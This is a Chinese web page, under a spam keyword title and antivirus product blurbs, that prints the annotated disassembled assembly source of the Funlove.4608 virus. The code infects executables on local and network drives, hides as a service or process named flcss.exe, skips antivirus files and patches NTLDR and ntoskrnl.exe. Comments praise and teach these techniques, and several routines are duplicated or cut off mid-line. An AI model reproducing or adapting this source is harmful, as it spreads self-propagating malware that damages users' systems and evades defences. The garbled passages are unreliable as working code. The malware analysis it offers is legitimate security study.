Funlove.4608的源代码 - 人体艺术摄影,汤芳人体艺术,tangfangbodyart,美女图片,唐芳摄影,汤芳艺术摄影视频,日本人体写真,张筱雨,美女,欧美人体摄影,俄罗斯人体艺术,软件下载,qq下载,电影下载,讯雷下载,msn下载,小说下载,单机游戏下载.mp4下载.电子书下载

Funlove.4608的源代码

作者：admin 来源：本站原创发布时间：2007-8-1 8:49:55

瑞星杀毒软件2008版，是基于新一代虚拟机脱壳引擎、采用三层主动防御策略开发的新一代信息安全产品。
瑞星08独创的“帐号保险柜”基于“主动防御”构架开发，可保护上百种流行软件的帐号，包括70 多款热门网游，30多种股票、网上银行类软件，QQ 、MSN等常用聊天工具及下载软件等。
同时，瑞星08采用"木马强杀"、"病毒DNA 识别"、"主动防御"、"恶意行为检测"等大量核心技术，

《Windows木马清道夫》是一款专门查杀并可辅助查杀木马的专业级反木马信息安全产品，是全新一代的木马克星！《Windows木马清道夫》可自动查杀数十万种木马，拥有海量木马病毒库,配合手动分析可近100%对未知木马进行查杀！它不仅可以查木马，还可以分析出后门程序,黑客程序等等。它专业的分析功能，完美的升级功能，使您不再惧怕木马，让您远离木马的困扰

卡巴斯基单机版（Kaspersky Anti-Virus Personal）是俄罗斯著名数据安全厂商Kaspersky Labs专为我国个人用户度身定制的反病毒产品。这款产品功能包括：病毒扫描、驻留后台的病毒防护程序、脚本病毒拦截器以及邮件检测程序，时刻监控一切病毒可能入侵的途径。产品采用第二代启发式代码分析技术、iChecker实时监控技术和独特的脚本病毒拦截技术等多种最尖端的反病毒技术

;*********************************************************************************************
; Flcss.asm
;
; disasm by Code Demon
;
; Code Demon Virus Dreaming Factory
;
;*********************************************************************************************

.586

ASSUME CS:CODE,DS:CODE

CODE SEGMENT USE32

VSize equ offset VEnd - VStart

Phys_VSize equ 1000

main:
;*********************************************************************************************
; 开始代码
;*********************************************************************************************
VStart:

call GetDelta ;此子程序用于取得病毒在内存中的开始地址,是绝大
;多数病毒都要用到的经典技术只一,对于写一些加密
;的软件有很大的帮助,莱鸟必看
lea esi,[offset HostCode + ebx]
mov edi,[esp]
sub edi,08
mov [esp],edi
movsd
movsd

push dword ptr [esp + 04]
call RelocKernel32 ;重定位Kernel32

or eax,eax
jz short Exit

cmp byte ptr [offset OS + ebx],00;判断操作系统的类型
jnz short NT_Srv

call Create9xProcess ;建立WIN9X进程
ret

NT_Srv: call CreateNTService ;建立NT服务
Exit: ret
;*********************************************************************************************
;建立NT服务的子程序
;*********************************************************************************************
CreateNTService:

call RelocAdvapi32

or eax,eax
jz short CNT_Failed

push 02
push 00
push 00 ; 取服务管理器的句柄
call OpenSCManagerA

or eax,eax
jz short CNT_Failed

mov SCM_Handle,eax

call CreateExecutable ;建立FLCSS.EXE,

or eax,eax ; 已经驻留内存就退出.
jz short CNT_Exit

mov edi,0F01FF
lea esi,offset [Service + ebx]
push edi
push esi
push SCM_Handle
call OpenServiceA

or eax,eax
jnz short CNT_Run

xor eax,eax
push eax
push eax
push eax
push eax
push eax
lea eax,[offset Buffer1 + ebx] ; flcss.exe
push eax
push 01 ;错误代码
push 02 ; 开始
push 20 ; 类型
push edi
push 00
push esi
push SCM_Handle ;句柄
call CreateServiceA ;建立服务

or eax,eax
jz short CNT_Failed

CNT_Run:

push 00
push 00
push eax
call StartServiceA ;开始服务

or eax,eax
jnz short CNT_Exit

CNT_Failed:

call StartInfectionThread ;传染子程序

CNT_Exit:

ret
;*********************************************************************************************
;建立WIN9X进程的子程序
;*********************************************************************************************
Create9xProcess:
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
call CreateExecutable

or eax,eax
jz short P9x_Exit
P9x_00:
xor eax,eax
lea edi,[offset Buffer2 + ebx]
push edi
push edi
mov ecx,040
repz stosd

mov cl,06
push eax
loop $ - 1

lea esi,[offset Buffer1 + ebx]
push esi
push 00
call CreateProcessA ;创建进程

or eax,eax
jnz short P9x_Exit

P9x_Failed:

call StartInfectionThread;传染子程序

P9x_Exit:
ret

****************************************************************************
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
****************************************************************************
CreateExecutable:
lea edi,[offset Buffer1 + ebx]
push edi

push 104
push edi
call GetSystemDirectoryA ;取得系统目录

add edi,eax
mov al,'\'
stosb
lea esi,[offset Process + ebx]
movsd
movsd
movsd

push 02
call OpenFile

cmp eax,-1
jz short CE_Exit

mov c_FileHandle,eax

lea edi,[offset VImports + ebx] ;清除 import
mov eax,-1
stosd
stosd

lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import
mov eax,[edi - 8]
stosd

push 00
lea esi,c_BytesWritten
push esi
push 0200
push ebx
push c_FileHandle
call WriteFile ; 写文件头

push 00
push esi
push 1000
push ebx
push c_FileHandle
call WriteFile ; 写入病毒主体

push c_FileHandle
call CloseHandle ;关闭文件

CE_Exit:
inc eax
ret
;************************************************************************************
;以下应该是病毒的服务程序
;************************************************************************************
VService:

call GetDelta

push dword ptr [esp]
call RelocKernel32

or eax,eax
jz VS_Exit

cmp byte ptr [offset OS + ebx],00 ;操作系统的类型
jz short W9x_Service_Register ;注册WIN9X服务

WNT_Service_Hacknowledge:

call RelocAdvapi32 ;重定位Advapi32
or eax,eax
jz VS_Exit

lea esi,[offset Buffer1 + ebx]

xor eax,eax
lea ecx,[offset Service + ebx]
lea edx,[offset ServiceDispatcher + ebx]
mov [esi],ecx
mov [esi + 04],edx
mov [esi + 08],eax
mov [esi + 0C],eax ; 将控制权返回给调用者

push esi
call StartServiceCtrlDispatcherA

W9x_Service_Register:

lea esi,[offset USER32_Name + ebx]
push esi
call LoadLibraryA

lea esi,[offset RegisterClassA+ ebx]
push esi
push eax
call GetProcAddress ;取进程的地址

or eax,eax
jz short VS_00

mov [esi - 06],eax

lea esi,[offset Buffer1 + ebx]
mov edi,esi
xor eax,eax
mov ecx,0A
repz stosd

mov dword ptr [esi + 04],-1
mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址
lea eax,[offset Service + ebx]
mov [esi + 24],eax

push esi
call RegisterClassA ; 这里非常重要

lea esi,[offset RegisterServiceProcess+ ebx]
push esi
push dword ptr [offset Kernel32_Base + ebx]
call GetProcAddress

or eax,eax
jz short VS_00

mov [esi - 06],eax

call GetCurrentProcessId ;取当前进程的ID
; 注册为服务

call GetCurrentProcessId ;取当前进程的ID
; 注册为服务进程,防止被用户
push 01 ;用CTRL+ALR+DEL从任务管理器中发现
push eax
call RegisterServiceProcess

push 8000 ; 延时
call Sleep

VS_00:
call StartInfectionThread

VS_Exit:
ret
;*********************************************************************************************
;NT服务子程序
;*********************************************************************************************
ServiceDispatcher:
call GetDelta
lea esi,[offset ServiceHandler + ebx]
lea edi,[offset Service + ebx]
push esi
push edi
call RegisterServiceCtrlHandlerA

mov Service_Handle,eax

lea esi,[offset Buffer1 + ebx]
mov edi,esi
mov ecx,06
xor eax,eax
repz stosd

mov dword ptr [esi],10
mov dword ptr [esi + 04],04
mov dword ptr [esi + 08],07

push esi
push Service_Handle ;告诉WINDOWS服务已经正确的运行
call SetServiceStatus

push 8000
call Sleep

call StartInfectionThread ;建立进程
ret

ServiceHandler:

ret ; 当管理员关闭服务时,提示系统出错!好东西!!!
;*********************************************************************************************
;此子程序用于建立线程
;*********************************************************************************************
StartInfectionThread:
call GetTickCount
mov [offset Rand + ebx],eax

lea eax,ThreadId
push eax
push 0
push 0
lea eax,[offset VThread + ebx]
push eax
push 0
push 0
call CreateThread
ret
;*********************************************************************************************
; 病毒线程
;*********************************************************************************************
VThread:
call GetDelta

call InfectDrives ;感染本地文件

push 60000
call Sleep

call GetRand
and al,1F
jnz short VThread

call InfectNetwork ;感染网络文件
jmp short VThread

;********************************************************************************
; 通过网络传染的子程序,值得借鉴
;********************************************************************************
InfectNetwork:
lea eax,[offset MPR_Name + ebx]
push eax
call LoadLibraryA

or eax,eax
jz short INet_Failed

push eax
lea esi,[offset MPR_Functions + ebx]
push esi
call DLL_Relocate

or eax,eax
jz short INet_Failed

push 00
call NetSearch

INet_Failed:
ret
;*********************************************************************************************
; 此子程序用于测试驱动器是否有效
;*********************************************************************************************
InfectDrives:
push esi

call GetTickCount
mov [offset Tick + ebx],eax

lea esi,[offset Buffer1 + ebx]
mov dword ptr [esi],' \:+ ebx - offset VStart'

ID_TestDrive:

mov byte ptr [esi + 03],00
push esi
call GetDriveTypeA ;取驱动器类型

cmp al,03 ;硬盘?
jz short ID_DriveOk

cmp al,04 ;网络驱动器?
jnz short ID_Invalid

ID_DriveOk:

add esi,03

push esi
call BlownAway

push esi
call FileSearch ;查找文件

sub esi,03

ID_Invalid:

mov al,[offset Buffer1 + ebx]
inc al
mov [offset Buffer1 + ebx],al

cmp al,'Z'
jna short ID_TestDrive

pop esi
ret
;*********************************************************************************************
;查找计算机
;*********************************************************************************************
NetSearch :
mov EnumBufferSize,4000
or EnumNB_Objects,-1

lea eax,WNetStructAddr
push eax
push WNetStructAddr
push 0
push 0
push 2
call WNetOpenEnumA

or eax,eax
jnz NET_Close

push 04
push 1000
push 4000
push 00
call VirtualAlloc

or eax,eax
jz short NET_Close

mov EnumBufferAddr,eax

NET_00:

mov esi,EnumBufferAddr

lea eax,EnumBufferSize
push eax
push esi
lea eax,EnumNB_Objects
push eax
push WNetStructAddr
call WNetEnumResourceA

or eax,eax
jnz short NET_Free

mov ecx,EnumNB_Objects
or ecx,ecx
jz short NET_00

NET_01:
push ecx
push esi

mov esi,[esi + 14] ; 计算机名
or esi,esi
jz short NET_03

cmp word ptr [esi],0041 ; 是否为软盘
jz short NET_03

lea edi,[offset Buffer1 + ebx]

NET_02:

movsb
cmp byte ptr [esi],00
jnz short NET_02

mov al,'\'
stosb

push edi
call BlownAway

push edi
call FileSearch

NET_03:

pop esi

mov eax,[esi + 0C]
and al,2
cmp al,2
jnz short NET_04

push esi
call NetSearch

NET_04:
add esi,20
pop ecx
loop NET_01

jmp short NET_00

NET_Free:
push 8000
push 00
push EnumBufferAddr
call VirtualFree

NET_Close:
push WNetStructAddr
call WNetCloseEnum
ret
;*************************************************************************************
; 查找文件子程序,这些跟以前DOS下没什么区别,
;
; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! ^_^
;*************************************************************************************
FileSearch:
mov eax,CurrentDirEnd
mov dword ptr [eax],002A2E2A ; *.*

lea edi,[offset Buffer2 + ebx]
lea esi,[offset Buffer1 + ebx]
push edi
push esi
call FindFirstFileA ;找第一个文件

cmp eax,-1
jz short RS_Exit

RS_00:
mov SearchHandle,eax

RS_01:
test byte ptr [edi],10 ; 测试是目录还是文件
jz short FileTest

RS_Directory:

cmp byte ptr [edi + 2C],'.'
jz short RS_Next

mov esi,edi
add esi,2C

mov edi,CurrentDirEnd

RSD_00:
movsb
cmp byte ptr [esi],0
jnz short RSD_00

mov al,'\'
stosb

push edi
call FileSearch

RS_Next:
lea edi,[offset Buffer2 + ebx]
push edi
push SearchHandle
call FindNextFileA ;查找下一个文件

or eax,eax
jnz short RS_01

push SearchHand

RS_Next:
lea edi,[offset Buffer2 + ebx]
push edi
push SearchHandle
call FindNextFileA ;查找下一个文件

or eax,eax
jnz short RS_01

push SearchHandle
call FindClose

RS_Exit:
ret
;********************************************************************
;没什么新意,略过吧
;********************************************************************
FileTest:

mov edx,[edi + 2C]
or edx,20202020
xor edx,61F81F61

lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染
mov ecx,0C

FT_00:
lodsd
cmp edx,eax
jz short FT_Exit

loop FT_00

;************************************************************************
;注意拉,
;************************************************************************
mov esi,edi
add esi,2C

FT_01:
lodsb
or al,al
jnz short FT_01

mov eax,[esi - 4] ; 扩展名判断
or eax,20202020

cmp eax,' xco' ;控件
jz short FT_02

cmp eax,' rcs' ;屏幕保护文件
jz short FT_02

cmp eax,' exe' ;标准的EXE文件
jnz short FT_Exit

FT_02:
mov eax,[edi + 20] ; 文件小于2000的就不感染
cmp eax,2000
jc short FT_Exit

cmp al,03 ; 检测是否已经感染
jz short FT_Exit

lea esi,[offset Buffer1 + ebx] ; 取文件名和路径
lea edi,[offset Buffer3 + ebx]
push edi

mov ecx,CurrentDirEnd
sub ecx,esi
repz movsb

lea esi,[offset Buffer2 + ebx]
add esi,2C

FT_03:
movsb
cmp byte ptr [esi - 1],0
jnz short FT_03

call InfectFile ;干活了,

FT_Exit:
jmp RS_Next
;*****************************************************************************************
;感染文件子程序
;*****************************************************************************************
InfectFile:
push i_Filename
push 03 ; 打开文件
call OpenFile

cmp eax,-1
jz IN_Exit

mov i_FileHandle,eax

push 00
push eax
call GetFileSize ;取文件大小,用于以后还原

mov i_FileSize,eax

cmp al,03 ; 是否感染
jz IN_Exit

lea edi,[offset Buffer3 + ebx]

push 00
lea esi,i_BytesRead
push esi
push 2000
push edi
push i_FileHandle
call ReadFile

;*********************************************************************************
;以下的程序跟文件头有关,建议没基础者找一些相关资料看看
;*********************************************************************************
cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧
jnz IN_CloseFile

cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件
jnz IN_CloseFile

cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小
ja IN_CloseFile

add edi,[edi + 3C] ;指向PE或NE文件头

mov eax,[edi]
cmp eax,00004550 ;PE文件吗?
jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H

cmp word ptr [edi + 5C],2 ; GUI????
jnz IN_CloseFile

mov esi,edi
add esi,18
add si,[edi + 14] ; 将ESI指向第一个节表
push esi

mov eax,[edi + 28] ; 查找包含"PE"的节表

IN_00:
mov ecx,[esi + 0C]
add ecx,[esi + 08]

cmp eax,ecx
jc short IN_01

add esi,28
jmp short IN_00

IN_01:
sub eax,[esi + 0C]
add eax,[esi + 14]
mov i_EP_Offset,eax

or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟
;DOS在程序和数据段上的一个重要改变
;也是写WINDOWS病毒要注意的地方之一
pop esi
xor ecx,ecx
mov cx,[edi + 06]
dec ecx
mov eax,ecx
mov edx,28
mul edx
add esi,eax ; ESI指向最后一个节表

mov eax,[esi + 24]
cmp al,80 ; 是否已经初始化
jz IN_CloseFile

or eax,8C000000 ; 将它改为可写,
and eax,not 12000000 ; 不共享,不可丢弃
mov [esi + 24],eax

mov ecx,i_FileSize ;这里好象跟SFX有点关系
mov edx,ecx
mov eax,ecx
clc
shr eax,03
sub edx,eax
sub edx,[esi + 14]
jc short IN_02

sub edx,[esi + 10]
jnc IN_CloseFile

IN_02: ; 重新计算节的长度

mov edx,[esi + 08]

sub ecx,[esi + 14]
jc short IN_03

cmp edx,ecx
ja short IN_03

mov edx,ecx

IN_03:
test edx,00000FFF
jz short IN_04

and edx,0FFFFF000
add edx,1000

IN_04:
mov ecx,edx
add ecx,[esi + 0C]
mov eax,ecx
add eax,4000
mov [edi + 50],eax ; 新的长度

sub ecx,[edi + 28]
add ecx,offset VStart - 100 - 08
mov i_HostDep32,ecx

mov eax,edx
add eax,4000 ; 改变虚拟大小
mov [esi + 08],eax

mov eax,edx
add eax,[esi + 14]
mov i_VirusOffset,eax

add edx,1000 ; 改变物理大小
mov [esi + 10],edx
add edx,[esi + 14]
add edx,03

push i_FileHandle
push edx
call MapFile

or eax,eax
jz short IN_CloseFile

mov i_MapHandle,eax

push eax
call ViewMap

or eax,eax
jz short IN_CloseMap

mov edx,eax

lea esi,[offset Buffer3 + ebx] ; 写PE文件头
mov edi,edx
mov ecx,2000
repz movsb

lea edi,[offset HostCode + ebx]
mov esi,i_EP_Offset
add esi,edx
movsd
movsd

mov edi,esi ; 设置CALL GS:Virus
sub edi,08
mov eax,00E8659090
stosd
mov eax,i_HostDep32
stosd

mov edi,edx
mov eax,i_FileSize
mov ecx,i_VirusOffset
sub ecx,eax
jna short IN_05

add edi,eax
xor al,al
repz stosb

IN_05:
mov esi,ebx ;写入病毒主体
mov edi,edx
add edi,i_VirusOffset
mov ecx,VSize
repz movsb

mov ecx,Phys_VSize - VSize + 3
repz stosb

push edx
call UnmapViewOfFile

IN_CloseMap:

push i_MapHandle
call CloseHandle ;关闭

call Wait_A_Little ;延时

IN_CloseFile:

lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间
push esi
sub esi,08
push esi
sub esi,08
push esi
push i_FileHandle
call SetFileTime

push i_FileHandle
call CloseHandle ;关闭文件

IN_Exit:
ret

;********************************************************************************
; 查找GetProcAddress 的子程序
;********************************************************************************
Whereis_GPA:

lea esi,[offset GPA_Sigs + ebx]

mov byte ptr [offset OS + ebx],00

mov eax,w_Kernel32
and eax,0FFF00000

cmp eax,0BFF00000
jnz short OS_WinNT?

OS_Win9x:

mov edi,0BFF70000
jmp short WG_00

OS_WinNT?:

inc byte ptr [offset OS + ebx]
add esi,08
cmp eax,077F00000
jnz short OS_Win2K?

mov edi,eax
jmp short WG_00

OS_Win2K?:

inc byte ptr [offset OS + ebx]
add esi,08
cmp eax,077E00000
jnz short WG_Failed

mov edi,077E80000

WG_00:

mov edx,edi
mov ecx,20000

WG_01:
push ecx
mov ecx,08
push esi
push edi
repz cmpsb
pop edi
pop esi
pop ecx
jz short WG_02
inc edi
loop WG_01

WG_Failed:

xor eax,eax
jmp short WG_03

WG_02:
add edi,03
mov [offset GetProcAddress + 1 + ebx],edi

mov eax,edx
mov [offset Kernel32_Base + ebx],eax

WG_03:
ret
;***************************************************************************************
;DLL 重定位子程序
;***************************************************************************************
DLL_Relocate:
mov esi,DLL_Func

DR_00:
mov eax,esi
add eax,07
push eax
push DLL_Base
call GetProcAddress

or eax,eax
jz short DR_03

DR_01:
mov [esi + 1],eax
add esi,07

DR_02:
lodsb
or al,al
jnz short DR_02

cmp byte ptr [esi],0B8
jz short DR_00

DR_03:
ret
;**********************************************************************************************
; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧
;**********************************************************************************************
BlownAway:
lea esi,[offset NTLDR + ebx]
mov edi,DirEnd
movsd
movsd

lea edi,[offset Buffer1 + ebx]
lea esi,[offset NT4_NTLDR + ebx]

cmp byte ptr [offset OS + ebx],01
jz short BA_00
add esi,10

BA_00:

push edi
push esi
push 05
call PatchFile

lea esi,[offset NTOSKRNL + ebx]
mov edi,DirEnd

BA_01:

movsb
cmp byte ptr [esi - 1],00
jnz short BA_01

lea edi,[offset Buffer1 + ebx]
lea esi,[offset NT4_NTOSKRNL + ebx]

cmp byte ptr [offset OS + ebx],01
jz short BA_02
add esi,18

BA_02:

push edi
push esi
push 09
call PatchFile
ret

PatchFile:
push p_Filename
push 03 ; 打开文件
call OpenFile

cmp eax,-1
jz short PA_Exit

mov p_FileHandle,eax

push 00
push eax
call GetFileSize ;取文件大小

mov p_FileSize,eax

push p_FileHandle
push eax
call MapFile

or eax,eax
jz short PA_CloseFile

mov p_MapHandle,eax

push eax
call ViewMap

or eax,eax
jz short PA_CloseMap

mov edx,eax

mov edi,eax
mov esi,p_PatchAddr
mov ecx,p_FileSize

PA_00:

push ecx
push esi
push edi
mov ecx,p_PatchSize
repz cmpsb
pop edi
pop esi
pop ecx
jz short PA_01
inc edi
loop PA_00

jmp short PA_Unmap

PA_01:

mov ecx,p_PatchSize
add esi,ecx
repz movsb

PA_Unmap:

push edx
call UnmapViewOfFile

PA_CloseMap:

push p_MapHandle
call CloseHandle

PA_CloseFile:

push p_FileHandle
call CloseHandle ;关闭文件

PA_Exit:
ret
;**********************************************************************************************
;此子程序用于取病毒在内存中的开始地址,经典技术
;**********************************************************************************************
GetDelta:
call delta
delta:
pop ebx
sub ebx,offset delta - VStart
ret
;**********************************************************************************************
;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法
;**********************************************************************************************
RelocKernel32:
push r_Kernel32
call Whereis_GPA

or eax,eax
jz short RK_00

push eax
lea esi,[offset Kernel32_Functions + ebx]
push esi
call DLL_Relocate
RK_00:
ret
;**********************************************************************************************
; 以下是重定位Advapi32的子程序
;**********************************************************************************************
RelocAdvapi32:
lea eax,[offset ADVAPI32_Name + ebx]
push eax
call LoadLibraryA
or eax,eax
jz short RA_00

push eax
lea esi,[offset ADVAPI32_Functions + ebx]
push esi
call DLL_Relocate

RA_00:
ret
;**********************************************************************************************
; 打开文件子程序
;**********************************************************************************************
OpenFile:
push 20
push o_Filename
call SetFileAttributesA

push 00
push 80 ; 普通属性
push o_OpenMode
push 00
push 00 ; 不共享,
push 0C0000000 ; 读写方式
push o_Filename
call CreateFileA
ret
;**********************************************************************************************
; 建立文件影象,找点资料看看吧
;**********************************************************************************************
MapFile:
push 00
push m_FileSize
push 00
push 04
push 00
push m_FileHandle
call CreateFileM
;**********************************************************************************************
; 建立文件影象,找点资料看看吧
;**********************************************************************************************
MapFile:
push 00
push m_FileSize
push 00
push 04
push 00
push m_FileHandle
call CreateFileMappingA
ret
ViewMap:
push 00
push 00
push 00
push 02
push v_MapHandle
call MapViewOfFile
ret
;**********************************************************************************************
; 延时,没什么说的了
;**********************************************************************************************
Wait_A_Little:
call GetTickCount
sub eax,[offset Tick + ebx]
cmp eax,4000
jc short WAL_00

push 16000
call Sleep

call GetTickCount
mov [offset Tick + ebx],eax
WAL_00:
ret
GetRand:
push ecx
push edx
mov eax,[offset Rand + ebx]
xor edx,edx
mov ecx,7FFFFFFF
mul ecx
inc eax
mov ecx,0FFFFFFFBh
div ecx
mov eax,edx
mov [offset Rand + ebx],eax
pop edx
pop ecx
ret
;**********************************************************************************************
;以下是一些数据
;**********************************************************************************************
HostCode db 8 dup (?)

GPA_Sigs:

W9x db 0C2,04,00,57,6A,22,2Bh,0D2
NT4 db 0C2,04,00,55,8Bh,4C,24,0C
W2K db 00F,00,00,55,8Bh,0ECh,51,51

NTLDR db 'NTLDR',0

NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志
db 3Bh,46,58,0EBh,07
W2K_NTLDR db 3Bh,47,58,74,07
db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志

NTOSKRNL db 'WINNT\System32\ntoskrnl.exe',0

NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志
db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00
W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上
db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28
;**********************************************************************************************
;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字,
;**********************************************************************************************
SkipNames:

dd 139D7300h ; aler
dd 0F977200h ; amon
dd 118E7E1Eh ; _avp
dd 52886900h ; avp3
dd 0C886900h ; avpm
dd 13883207h ; f-pr
dd 168E7E0Fh ; navw
dd 0F997C12h ; scan
dd 128B7212h ; smss
dd 04907B05h ; ddhe
dd 00946F05h ; dpla
dd 00946F0Ch ; mpla

Process db 'flcss.exe',0
Service db 'FLC',0

; Import节表

VImports:
dd offset Kernel32_Pointers
dd -1,-1
dd offset Kernel32_Name
dd offset Kernel32_Relocated
db 14 dup (0)

Kernel32_Pointers dd offset Kernel32_Beep
Kernel32_Relocated dd offset Kernel32_Beep
Kernel32_Beep db ?,?,'Beep',0

;*********************************************************************************************
; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了,
;
; 注: 绝顶高手--------没有头发的高手
;*********************************************************************************************
Kernel32_Name db 'KERNEL32.dll',0
Kernel32_Functions:

CloseHandle: db 0B8,4 dup(?),0FF,0E0,'CloseHandle',0
CreateFileA: db 0B8,4 dup(?),0FF,0E0,'CreateFileA',0
CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0
CreateProcessA: db 0B8,4 dup(?),0FF,0E0,'CreateProcessA',0
CreateThread: db 0B8,4 dup(?),0FF,0E0,'CreateThread',0
FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0
FindNextFileA: db 0B8,4 dup(?),0FF,0E0,'FindNextFileA',0
FindClose: db 0B8,4 dup(?),0FF,0E0,'FindClose',0
GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0
GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0
GetFileSize: db 0B8,4 dup(?),0FF,0E0,'GetFileSize',0
GetProcAddress: db 0B8,4 dup(?),0FF,0E0,'GetProcAddress',0
GetTickCount: db 0B8,4 dup(?),0FF,0E0,'GetTickCount',0
GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0
LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0
MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0
ReadFile: db 0B8,4 dup(?),0FF,0E0,'ReadFile',0
SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0
SetFileTime: db 0B8,4 dup(?),0FF,0E0,'SetFileTime',0
Sleep: db 0B8,4 dup(?),0FF,0E0,'Sleep',0
UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0
VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0
VirtualFree: db 0B8,4 dup(?),0FF,0E0,'VirtualFree',0
WriteFile: db 0B8,4 dup(?),0FF,0E0,'WriteFile',0

;注:下面的API在WIN9X中是没有的

db 0
RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0

USER32_Name db 'USER32.dll',0
RegisterClassA: db 0B8,4 dup(?),0FF,0E0,'RegisterClassA',0

ADVAPI32_Name db 'ADVAPI32.dll',0
ADVAPI32_Functions:

OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0
OpenServiceA: db 0B8,4 dup(?),0FF,0E0,'OpenServiceA',0
CreateServiceA: db 0B8,4 dup(?),0FF,0E0,'CreateServiceA',0
StartServiceA: db 0B8,4 dup(?),0FF,0E0,'StartServiceA',0
StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0
RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0
SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0

MPR_Name db 'MPR.dll',0

MPR_Functions:

WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0
WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0
WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0

;病毒应该是在这里就结束了
vend:

Kernel32_Base dd ?
Rand dd ?
Tick dd ?
OS db ?

ALIGN 100

Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录
Buffer2 db 200 dup (?)
Buffer3 db 2000 dup (?) ;此处用于存放读入的文件

CODE ENDS

END main

上一篇新频道：红码变种Codered.F蠕虫分析
下一篇新频道：1i0n蠕虫分析

[ ] [返回上一页] [打印]